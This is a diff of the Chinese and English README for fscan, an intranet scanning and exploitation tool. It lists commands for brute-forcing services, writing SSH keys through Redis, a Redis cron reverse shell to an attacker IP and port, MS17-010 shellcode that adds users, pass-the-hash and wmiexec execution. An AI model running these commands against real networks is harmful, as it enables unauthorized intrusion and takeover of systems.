支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写私钥、计划任务反弹shell、读取win网卡信息、web漏洞扫描等。
|
||||
趁着最近有空,用go把f-scrack重构了一遍。使用go来编写,也有更好的扩展性及兼容性。
|
||||
还在逐步增加功能,欢迎各位师傅提意见。
|
||||
# 1. 简介
|
||||
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
|
||||
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
|
||||
|
||||
# 2. 主要功能
|
||||
1.信息搜集:
|
||||
* 存活探测(icmp)
|
||||
* 端口扫描
|
||||
|
||||
## why
|
||||
为什么有LadonGo、x-crack 、tscan、Gscan 这些工具了还要写fscan
|
||||
2.爆破功能:
|
||||
* 各类服务爆破(ssh、smb、rdp等)
|
||||
* 数据库密码爆破(mysql、mssql、redis、psql、oracle等)
|
||||
|
||||
答:
|
||||
因为用习惯了f-scrack,习惯一条命令跑完所有模块,省去一个个模块单独调用的时间,当然我附加了-m 指定模块的功能。
|
||||
3.系统信息、漏洞扫描:
|
||||
* netbios探测、域控识别
|
||||
* 获取目标网卡信息
|
||||
* 高危漏洞扫描(ms17010等)
|
||||
|
||||
## 最近更新
|
||||
[+] 2021/2/5 修改icmp发包模式,更适合大规模探测。
|
||||
修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度
|
||||
[+] 2020/12/12 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试
|
||||
[+] 2020/12/6 优化icmp模块,新增-domain 参数(用于smb爆破模块,适用于域用户)
|
||||
[+] 2020/12/03 优化ip段处理模块、icmp、端口扫描模块。新增支持192.168.1.1-192.168.255.255。
|
||||
[+] 2020/11/17 增加-ping 参数,作用是存活探测模块用ping代替icmp发包。
|
||||
[+] 2020/11/17 增加WebScan模块,新增shiro简单识别。https访问时,跳过证书认证。将服务模块和web模块的超时分开,增加-wt 参数(WebTimeout)。
|
||||
[+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认11000,适合扫B段
|
||||
[+] 2020/11/15 支持ip以文件导入,-hs ip.txt,并对去重做了处理
|
||||
4.Web探测功能:
|
||||
* webtitle探测
|
||||
* web指纹识别(常见cms、oa框架等)
|
||||
* web漏洞扫描(weblogic、st2等,支持xray的poc)
|
||||
|
||||
## usege
|
||||
5.漏洞利用:
|
||||
* redis写公钥或写计划任务
|
||||
* ssh命令执行
|
||||
* ms17017利用(植入shellcode),如添加用户等
|
||||
|
||||
6.其他功能:
|
||||
* 文件保存
|
||||
|
||||
# 3. 使用说明
|
||||
简单用法
|
||||
```
|
||||
go run main.go -h 192.168.1.1/24
|
||||
fscan.exe -h 192.168.1.1/24 (默认使用全部模块)
|
||||
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写私钥)
|
||||
fscan.exe -h 192.168.1.1/16 (B段扫描)
|
||||
```
|
||||
|
||||
其他用法
|
||||
```
|
||||
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
|
||||
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
|
||||
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
|
||||
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
|
||||
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
|
||||
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
|
||||
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
|
||||
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
|
||||
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
|
||||
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
|
||||
fscan.exe -hf ip.txt (以文件导入)
|
||||
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
|
||||
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
|
||||
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
|
||||
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
|
||||
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
|
||||
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
|
||||
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)
|
||||
```
|
||||
编译命令
|
||||
```
|
||||
-h 192.168.1.1/24 (C段)
|
||||
-h 192.168.1.1/16 (B段)
|
||||
-h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
|
||||
-hf ip.txt (以文件导入)
|
||||
go build -ldflags="-s -w " -trimpath main.go
|
||||
upx -9 fscan.exe (可选,压缩体积)
|
||||
```
|
||||
|
||||
arch用户安装
|
||||
`yay -S fscan-git 或者 paru -S fscan-git`
|
||||
|
||||
完整参数
|
||||
```
|
||||
-Num int
|
||||
poc rate (default 20)
|
||||
-c string
|
||||
exec command (ssh)
|
||||
ssh命令执行
|
||||
-cookie string
|
||||
设置cookie
|
||||
-debug int
|
||||
多久没响应,就打印当前进度(default 60)
|
||||
-domain string
|
||||
smb domain
|
||||
smb爆破模块时,设置域名
|
||||
-h string
|
||||
IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
|
||||
目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
|
||||
-hf string
|
||||
host file, -hs ip.txt
|
||||
-it int
|
||||
Icmp Threads nums (default 11000)
|
||||
读取文件中的目标
|
||||
-hn string
|
||||
扫描时,要跳过的ip: -hn 192.168.1.1/24
|
||||
-m string
|
||||
Select scan type ,as: -m ssh (default "all")
|
||||
设置扫描模式: -m ssh (default "all")
|
||||
-no
|
||||
not to save output log
|
||||
扫描结果不保存到文件中
|
||||
-nobr
|
||||
跳过sql、ftp、ssh等的密码爆破
|
||||
-nopoc
|
||||
not to scan web vul
|
||||
跳过web poc扫描
|
||||
-np
|
||||
not to ping
|
||||
跳过存活探测
|
||||
-num int
|
||||
web poc 发包速率 (default 20)
|
||||
-o string
|
||||
Outputfile (default "result.txt")
|
||||
扫描结果保存到哪 (default "result.txt")
|
||||
-p string
|
||||
Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,11211,27017")
|
||||
设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
|
||||
-pa string
|
||||
新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)
|
||||
-path string
|
||||
fcgi、smb romote file path
|
||||
-ping
|
||||
using ping replace icmp
|
||||
使用ping代替icmp进行存活探测
|
||||
-pn string
|
||||
扫描时要跳过的端口,as: -pn 445
|
||||
-pocname string
|
||||
use the pocs these contain pocname, -pocname weblogic
|
||||
指定web poc的模糊名字, -pocname weblogic
|
||||
-proxy string
|
||||
set poc proxy, -proxy http://127.0.0.1:8080
|
||||
-pwd string
|
||||
password
|
||||
-pwdf string
|
||||
password file
|
||||
-rf string
|
||||
redis file to write sshkey file (as: -rf id_rsa.pub)
|
||||
-rs string
|
||||
redis shell to write cron file (as: -rs 192.168.1.1:6666)
|
||||
-t int
|
||||
Thread nums (default 200)
|
||||
-time int
|
||||
Set timeout (default 3)
|
||||
设置代理, -proxy http://127.0.0.1:8080
|
||||
-user string
|
||||
username
|
||||
指定爆破时的用户名
|
||||
-userf string
|
||||
username file
|
||||
指定爆破时的用户名文件
|
||||
-pwd string
|
||||
指定爆破时的密码
|
||||
-pwdf string
|
||||
指定爆破时的密码文件
|
||||
-rf string
|
||||
指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)
|
||||
-rs string
|
||||
redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)
|
||||
-silent
|
||||
静默扫描,适合cs扫描时不回显
|
||||
-sshkey string
|
||||
ssh连接时,指定ssh私钥
|
||||
-t int
|
||||
扫描线程 (default 600)
|
||||
-time int
|
||||
端口扫描超时时间 (default 3)
|
||||
-u string
|
||||
指定Url扫描
|
||||
-uf string
|
||||
指定Url文件扫描
|
||||
-wt int
|
||||
Set web timeout (default 3)
|
||||
|
||||
web访问超时时间 (default 5)
|
||||
-pocpath string
|
||||
指定poc路径
|
||||
-usera string
|
||||
在原有用户字典基础上,新增新用户
|
||||
-pwda string
|
||||
在原有密码字典基础上,增加新密码
|
||||
-socks5
|
||||
指定socks5代理 (as: -socks5 socks5://127.0.0.1:1080)
|
||||
-sc
|
||||
指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)
|
||||
```
|
||||
|
||||
## 运行截图
|
||||
# 4. 运行截图
|
||||
|
||||
`fscan.exe -h 192.168.x.x (全功能、ms17010、读取网卡信息)`
|
||||
![](image/1.png)
|
||||
|
||||
![](image/4.png)
|
||||
|
||||
`fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写私钥)`
|
||||
`fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)`
|
||||
![](image/2.png)
|
||||
|
||||
`fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)`
|
||||
|
@ -112,16 +166,80 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
|
|||
`fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc`
|
||||
![](image/2020-12-12-13-34-44.png)
|
||||
|
||||
## 未来计划
|
||||
[*] 合理输出当前扫描进度
|
||||
[*] 增加内网常见高危漏洞
|
||||
[*] 增加高危web漏洞扫描
|
||||
[*] 师傅们觉得有必要加的漏洞,也可以提issue
|
||||
`fscan.exe -h 192.168.x.x -p 139 (netbios探测、域控识别,下图的[+]DC代表域控)`
|
||||
![](image/netbios.png)
|
||||
|
||||
`go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息)`
|
||||
![](image/netbios1.png)
|
||||
|
||||
`go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)`
|
||||
![img.png](image/live.png)
|
||||
|
||||
# 5. 免责声明
|
||||
|
||||
本工具仅面向**合法授权**的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。
|
||||
|
||||
为避免被恶意使用,本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击和漏洞利用。
|
||||
|
||||
在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。**请勿对非授权目标进行扫描。**
|
||||
|
||||
如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。
|
||||
|
||||
在安装并使用本工具前,请您**务必审慎阅读、充分理解各条款内容**,限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。
|
||||
除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。
|
||||
|
||||
|
||||
## 参考链接
|
||||
# 6. 404StarLink 2.0 - Galaxy
|
||||
![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)
|
||||
|
||||
fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-Galaxy) 中的一环,如果对fscan 有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。
|
||||
|
||||
- [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community)
|
||||
|
||||
|
||||
# 7. Star Chart
|
||||
[![Stargazers over time](https://starchart.cc/shadow1ng/fscan.svg)](https://starchart.cc/shadow1ng/fscan)
|
||||
|
||||
# 8. 捐赠
|
||||
如果你觉得这个项目对你有帮助,你可以请作者喝饮料🍹 [点我](image/sponsor.png)
|
||||
|
||||
# 9. 参考链接
|
||||
https://github.com/Adminisme/ServerScan
|
||||
https://github.com/netxfly/x-crack
|
||||
https://github.com/hack2fun/Gscan
|
||||
https://github.com/k8gege/LadonGo
|
||||
https://github.com/jjf012/gopoc
|
||||
|
||||
|
||||
# 10. 最近更新
|
||||
[+] 2022/11/19 加入hash碰撞、wmiexec无回显命令执行。
|
||||
[+] 2022/7/14 -hf 支持host:port和host/xx:port格式,rule.Search 正则匹配范围从body改成header+body,-nobr不再包含-nopoc.优化webtitle 输出格式。
|
||||
[+] 2022/7/6 加入手工gc回收,尝试节省无用内存。 -url 支持逗号隔开。 修复一个poc模块bug。-nobr不再包含-nopoc。
|
||||
[+] 2022/7/2 加强poc fuzz模块,支持跑备份文件、目录、shiro-key(默认跑10key,可用-full参数跑100key)等。新增ms17017利用(使用参数: -sc add),可在ms17010-exp.go自定义shellcode,内置添加用户等功能。
|
||||
新增poc、指纹。支持socks5代理。因body指纹更全,默认不再跑ico图标。
|
||||
[+] 2022/4/20 poc模块加入指定目录或文件 -pocpath poc路径,端口可以指定文件-portf port.txt,rdp模块加入多线程爆破demo, -br xx指定线程。
|
||||
[+] 2022/2/25 新增-m webonly,跳过端口扫描,直接访问http。致谢@AgeloVito
|
||||
[+] 2022/1/11 新增oracle密码爆破。
|
||||
[+] 2022/1/7 扫ip/8时,默认会扫每个C段的网关和数个随机IP,推荐参数:-h ip/8 -m icmp.新增LiveTop功能,检测存活时,默认会输出top10的B、C段ip存活数量。
|
||||
[+] 2021/12/7 新增rdp扫描,新增添加端口参数-pa 3389(会在原有端口列表基础上,新增该端口)。
|
||||
[+] 2021/12/1 优化xray解析模块,支持groups、新增poc,加入https判断(tls握手包),优化ip解析模块(支持所有ip/xx),增加爆破关闭参数 -nobr,添加跳过某些ip扫描功能 -hn 192.168.1.1,添加跳过某些端口扫描功能-pn 21,445,增加扫描docker未授权漏洞。
|
||||
[+] 2021/6/18 改善一下poc的机制,如果识别出指纹会根据指纹信息发送poc,如果没有识别到指纹才会把所有poc打一遍。
|
||||
[+] 2021/5/29 加入fcgi协议未授权命令执行扫描,优化poc模块,优化icmp模块,ssh模块加入私钥连接。
|
||||
[+] 2021/5/15 新增win03版本(删减了xray_poc模块),增加-silent 静默扫描模式,添加web指纹,修复netbios模块数组越界,添加一个CheckErrs字典,webtitle 增加gzip解码。
|
||||
[+] 2021/5/6 更新mod库、poc、指纹。修改线程处理机制、netbios探测、域控识别模块、webtitle编码模块等。
|
||||
[+] 2021/4/22 修改webtitle模块,加入gbk解码。
|
||||
[+] 2021/4/21 加入netbios探测、域控识别。
|
||||
[+] 2021/3/4 支持-u url或者-uf url.txt,对url进行批量扫描。
|
||||
[+] 2021/2/25 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml。
|
||||
[+] 2021/2/8 增加指纹识别功能,可识别常见CMS、框架,如致远OA、通达OA等。
|
||||
[+] 2021/2/5 修改icmp发包模式,更适合大规模探测。
|
||||
修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度。
|
||||
[+] 2020/12/12 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试。
|
||||
[+] 2020/12/6 优化icmp模块,新增-domain 参数(用于smb爆破模块,适用于域用户) 。
|
||||
[+] 2020/12/03 优化ip段处理模块、icmp、端口扫描模块。新增支持192.168.1.1-192.168.255.255。
|
||||
[+] 2020/11/17 增加-ping 参数,作用是存活探测模块用ping代替icmp发包。
|
||||
[+] 2020/11/17 增加Web_Scan模块,新增shiro简单识别。https访问时,跳过证书认证。将服务模块和web模块的超时分开,增加-wt 参数(WebTimeout)。
|
||||
[+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认11000,适合扫B段 。
|
||||
[+] 2020/11/15 支持ip以文件导入,-hf ip.txt,并对去重做了处理。
|
||||
|
||||
[url-docen]: README_EN.md
|
|
@ -0,0 +1,260 @@
|
|||
# fscan
|
||||
[中文][url-doczh]
|
||||
|
||||
# 1. Introduction
|
||||
An intranet comprehensive scanning tool, which is convenient for automatic and omnidirectional missed scanning.
|
||||
It supports host survival detection, port scanning, explosion of common services, ms17010, Redis batch public key writing, planned task rebound shell, reading win network card information, web fingerprint identification, web vulnerability scanning, netbios detection, domain control identification and other functions.
|
||||
|
||||
# 2. Functions
|
||||
1.Information collection:
|
||||
* Survival detection(icmp)
|
||||
* Port scanning
|
||||
|
||||
2.Blasting:
|
||||
* Various service blasting(ssh、smb、rdp, etc.)
|
||||
* Database password blasting(mysql、mssql、redis、psql、oracle, etc.)
|
||||
|
||||
3.System information, vulnerability scanning:
|
||||
* Netbios detection, domain control identification
|
||||
* Collect NIC information
|
||||
* High Risk Vulnerability Scanning(ms17010, etc.)
|
||||
|
||||
4.Web detection:
|
||||
* Webtitle detection
|
||||
* Web fingerprinting (cms, oa framework, etc.)
|
||||
* Web vulnerability scanning (weblogic, st2, etc., also supports xray poc)
|
||||
|
||||
5.Exploit:
|
||||
* Write redis public key and scheduled tasks
|
||||
* Excute ssh command
|
||||
* Use the ms17017 vulnerability (implanted shellcode), such as adding users, etc.
|
||||
|
||||
6.Others:
|
||||
* Save ouput result
|
||||
|
||||
# 3. Instructions
|
||||
Getting Started
|
||||
```
|
||||
fscan.exe -h 192.168.1.1/24
|
||||
fscan.exe -h 192.168.1.1/16
|
||||
```
|
||||
|
||||
Advanced
|
||||
```
|
||||
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(Skip survival detection, do not save output result, skip web poc scanning)
|
||||
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (Redis write public key)
|
||||
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (Redis scheduled task rebound shell)
|
||||
fscan.exe -h 192.168.1.1/24 -c whoami (Execute ssh command)
|
||||
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (Specify ssh module and port)
|
||||
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (Load the specified file and password to blast
|
||||
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (Specify the path to save the scan results, which is saved in the current path by default)
|
||||
fscan.exe -h 192.168.1.1/8 192.x.x.1 and 192.x.x.254 of segment A, convenient for quickly viewing network segment information )
|
||||
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (Smb password crash)
|
||||
fscan.exe -h 192.168.1.1/24 -m ms17010 (Specified ms17010 module)
|
||||
fscan.exe -hf ip.txt (Import target from file)
|
||||
fscan.exe -u http://baidu.com -proxy 8080 (Scan a url and set http proxy http://127.0.0.1:8080)
|
||||
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (Do not blast, do not scan Web poc, to reduce traffic)
|
||||
fscan.exe -h 192.168.1.1/24 -pa 3389 (Join 3389->rdp scan)
|
||||
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (Proxy only supports simple tcp functions, and libraries with some functions do not support proxy settings)
|
||||
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (Built-in functions such as adding users are only applicable to alternative tools, and other special tools for using ms17010 are recommended)
|
||||
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (Hash collision)
|
||||
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx(Wmiexec module no echo command execution)
|
||||
```
|
||||
Compile command
|
||||
```
|
||||
go build -ldflags="-s -w " -trimpath main.go
|
||||
upx -9 fscan.exe (Optional, compressed)
|
||||
```
|
||||
Installation for arch users
|
||||
`yay -S fscan-git or paru -S fscan-git`
|
||||
|
||||
Full parameters
|
||||
```
|
||||
Usage of ./fscan:
|
||||
-br int
|
||||
Brute threads (default 1)
|
||||
-c string
|
||||
exec command (ssh|wmiexec)
|
||||
-cookie string
|
||||
set poc cookie,-cookie rememberMe=login
|
||||
-debug int
|
||||
every time to LogErr (default 60)
|
||||
-dns
|
||||
using dnslog poc
|
||||
-domain string
|
||||
smb domain
|
||||
-full
|
||||
poc full scan,as: shiro 100 key
|
||||
-h string
|
||||
IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
|
||||
-hash string
|
||||
hash
|
||||
-hf string
|
||||
host file, -hf ip.txt
|
||||
-hn string
|
||||
the hosts no scan,as: -hn 192.168.1.1/24
|
||||
-m string
|
||||
Select scan type ,as: -m ssh (default "all")
|
||||
-no
|
||||
not to save output log
|
||||
-nobr
|
||||
not to Brute password
|
||||
-nopoc
|
||||
not to scan web vul
|
||||
-np
|
||||
not to ping
|
||||
-num int
|
||||
poc rate (default 20)
|
||||
-o string
|
||||
Outputfile (default "result.txt")
|
||||
-p string
|
||||
Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
|
||||
-pa string
|
||||
add port base DefaultPorts,-pa 3389
|
||||
-path string
|
||||
fcgi、smb romote file path
|
||||
-ping
|
||||
using ping replace icmp
|
||||
-pn string
|
||||
the ports no scan,as: -pn 445
|
||||
-pocname string
|
||||
use the pocs these contain pocname, -pocname weblogic
|
||||
-pocpath string
|
||||
poc file path
|
||||
-portf string
|
||||
Port File
|
||||
-proxy string
|
||||
set poc proxy, -proxy http://127.0.0.1:8080
|
||||
-pwd string
|
||||
password
|
||||
-pwda string
|
||||
add a password base DefaultPasses,-pwda password
|
||||
-pwdf string
|
||||
password file
|
||||
-rf string
|
||||
redis file to write sshkey file (as: -rf id_rsa.pub)
|
||||
-rs string
|
||||
redis shell to write cron file (as: -rs 192.168.1.1:6666)
|
||||
-sc string
|
||||
ms17 shellcode,as -sc add
|
||||
-silent
|
||||
silent scan
|
||||
-socks5 string
|
||||
set socks5 proxy, will be used in tcp connection, timeout setting will not work
|
||||
-sshkey string
|
||||
sshkey file (id_rsa)
|
||||
-t int
|
||||
Thread nums (default 600)
|
||||
-time int
|
||||
Set timeout (default 3)
|
||||
-top int
|
||||
show live len top (default 10)
|
||||
-u string
|
||||
url
|
||||
-uf string
|
||||
urlfile
|
||||
-user string
|
||||
username
|
||||
-usera string
|
||||
add a user base DefaultUsers,-usera user
|
||||
-userf string
|
||||
username file
|
||||
-wmi
|
||||
start wmi
|
||||
-wt int
|
||||
Set web timeout (default 5)
|
||||
```
|
||||
|
||||
# 4. Demo
|
||||
|
||||
`fscan.exe -h 192.168.x.x (Open all functions, ms17010, read network card information)`
|
||||
![](image/1.png)
|
||||
|
||||
![](image/4.png)
|
||||
|
||||
`fscan.exe -h 192.168.x.x -rf id_rsa.pub (Redis write public key)`
|
||||
![](image/2.png)
|
||||
|
||||
`fscan.exe -h 192.168.x.x -c "whoami;id" (ssh command)`
|
||||
![](image/3.png)
|
||||
|
||||
`fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 (Support for xray poc)`
|
||||
![](image/2020-12-12-13-34-44.png)
|
||||
|
||||
`fscan.exe -h 192.168.x.x -p 139 (Netbios detection, domain control identification, the [+]DC in the figure below represents domain control)`
|
||||
![](image/netbios.png)
|
||||
|
||||
`go run .\main.go -h 192.168.x.x/24 -m netbios (Show complete netbios information)`
|
||||
![](image/netbios1.png)
|
||||
|
||||
`go run .\main.go -h 192.0.0.0/8 -m icmp(Detect the gateway and several random IPs of each segment C, and count the number of surviving top 10 segments B and C)`
|
||||
![img.png](image/live.png)
|
||||
|
||||
# 5. Disclaimer
|
||||
|
||||
This tool is only for **legally authorized** enterprise security construction activities. If you need to test the usability of this tool, please build a target machine environment by yourself.
|
||||
|
||||
In order to avoid being used maliciously, all pocs included in this project are theoretical judgments of vulnerabilities, there is no process of exploiting vulnerabilities, and no real attacks and exploits will be launched on the target.
|
||||
|
||||
When using this tool for detection, you should ensure that the behavior complies with local laws and regulations, and you have obtained sufficient authorization. **Do not scan unauthorized targets**.
|
||||
|
||||
If you have any illegal acts during the use of this tool, you shall bear the corresponding consequences by yourself, and we will not bear any legal and joint liability.
|
||||
|
||||
Before installing and using this tool, please **be sure to carefully read and fully understand the content of each clause**. Restrictions, exemption clauses or other clauses involving your major rights and interests may remind you to pay attention in the form of bold, underline, etc. .
|
||||
Unless you have fully read, fully understood and accepted all the terms of this agreement, please do not install and use this tool. Your use behavior or your acceptance of this agreement in any other express or implied way shall be deemed to have read and agreed to be bound by this agreement.
|
||||
|
||||
|
||||
# 6. 404StarLink 2.0 - Galaxy
|
||||
![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)
|
||||
|
||||
Fscan is the member of 404Team [404StarLink2.0](https://github.com/knownsec/404StarLink2.0-Galaxy),If you have any questions about fscan or want to find a partner to communicate with, you can adding groups.
|
||||
|
||||
- [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community)
|
||||
|
||||
|
||||
# 7. Star Chart
|
||||
[![Stargazers over time](https://starchart.cc/shadow1ng/fscan.svg)](https://starchart.cc/shadow1ng/fscan)
|
||||
|
||||
# 8. Donation
|
||||
If you think this project is helpful to you, invite the author to have a drink🍹 [click](image/sponsor.png)
|
||||
|
||||
# 9. Reference links
|
||||
https://github.com/Adminisme/ServerScan
|
||||
https://github.com/netxfly/x-crack
|
||||
https://github.com/hack2fun/Gscan
|
||||
https://github.com/k8gege/LadonGo
|
||||
https://github.com/jjf012/gopoc
|
||||
|
||||
|
||||
# 10. Dynamics
|
||||
[+] 2022/11/19 Add hash collision, wmiexec echo free command execution function
|
||||
[+] 2022/7/14 Add -hf parameter, support host: port and host/xx: port formats, rule.Search regular matching range is changed from body to header+body, and -nobr no longer includes -nopoc. Optimize webtitle output format.
|
||||
[+] 2022/7/6 Add manual gc recycling to try to save useless memory, -Urls support comma separation. Fix a poc module bug- Nobr no longer contains nopoc.
|
||||
[+] 2022/7/2 Strengthen the poc fuzzy module to support running backup files, directories, shiro keys (10 keys by default, 100 keys with the -full parameter), etc.Add ms17017 (use parameter: -sc add), which can be used in ms17010 exp Go defines the shell code, and built-in functions such as adding users.
|
||||
Add poc and fingerprint. Socks5 proxy is supported. Because the body fingerprint is more complete, the icon icon is no longer running by default.
|
||||
[+] 2022/4/20 The poc module adds the specified directory or file -path poc path, the port can specify the file -portf port.txt, the rdp module adds the multi-threaded explosion demo, and -br xx specifies the thread.
|
||||
[+] 2022/2/25 Add - m webonly to skip port scanning and directly access http. Thanks @ AgeloVito
|
||||
[+] 2022/1/11 Add oracle password explosion.
|
||||
[+] 2022/1/7 When scanning IP/8, each C segment gateway and several random IPs will be scanned by default. Recommended parameter: -h ip/8 -m icmp. The LiveTop function is added. When detecting the survival, the number of B and C segment IPs of top10 will be output by default.
|
||||
[+] 2021/12/7 Add rdp scanning and port parameter -pa 3389 (the port will be added based on the original port list)
|
||||
[+] 2021/12/1 Optimize the xray parsing module, support groups, add poc, add https judgment (tls handshake package), optimize the ip parsing module (support all ip/xx), add the blasting shutdown parameter nobr, add the skip certain ip scanning function -hn 192.168.1.1, add the skip certain port scanning function - pn 21445, and add the scan Docker unauthorized vulnerability.
|
||||
[+] 2021/6/18 Improve the poc mechanism. If the fingerprint is identified, the poc will be sent according to the fingerprint information. If the fingerprint is not identified, all poc will be printed once.
|
||||
[+] 2021/5/29 Adding the fcgi protocol to execute the scan of unauthorized commands, optimizing the poc module, optimizing the icmp module, and adding the ssh module to the private key connection.
|
||||
[+] 2021/5/15 Added win03 version (deleted xray_poc module), added silent scanning mode, added web fingerprint, fixed netbios module array overrun, added a CheckErrs dictionary, and added gzip decoding to webtitle.
|
||||
[+] 2021/5/6 Update mod library, poc and fingerprint. Modify thread processing mechanism, netbios detection, domain control identification module, webtitle encoding module, etc.
|
||||
[+] 2021/4/22 Modify webtitle module and add gbk decoding.
|
||||
[+] 2021/4/21 Add netbios detection and domain control identification functions.
|
||||
[+] 2021/3/4 Support -u url and -uf parameters, support batch scan URLs.
|
||||
[+] 2021/2/25 Modify the yaml parsing module to support password explosion, such as tomcat weak password. The new sets parameter in yaml is an array, which is used to store passwords. See tomcat-manager-week.yaml for details.
|
||||
[+] 2021/2/8 Add fingerprint identification function to identify common CMS and frameworks, such as Zhiyuan OA and Tongda OA.
|
||||
[+] 2021/2/5 Modify the icmp packet mode, which is more suitable for large-scale detection.
|
||||
Modify the error prompt. If there is no new progress in - debug within 10 seconds, the current progress will be printed every 10 seconds.
|
||||
[+] 2020/12/12 The yaml parsing engine has been added to support the poc of xray. By default, all the poc are used (the poc of xray has been filtered). You can use - pocname weblogic, and only one or some poc is used. Need go version 1.16 or above, and can only compile the latest version of go for testing.
|
||||
[+] 2020/12/6 Optimize the icmp module and add the -domain parameter (for the smb blasting module, applicable to domain users)
|
||||
